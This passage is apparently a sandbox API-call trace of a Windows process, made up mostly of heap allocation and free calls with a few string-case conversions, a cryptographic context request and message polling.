CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0160.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0160.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.680] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0160.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0160.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0160.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0160.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0160.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0160.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0160.684] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0160.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0160.684] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0160.685] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0160.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0160.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0160.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.686] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0160.686] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0160.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0160.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0160.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.687] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.687] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0160.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0160.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.687] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.688] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0160.688] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.688] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0160.688] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0160.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0160.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.688] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0160.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0160.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0160.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0160.689] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0160.689] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.689] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0160.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0160.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.690] HeapFree (in: 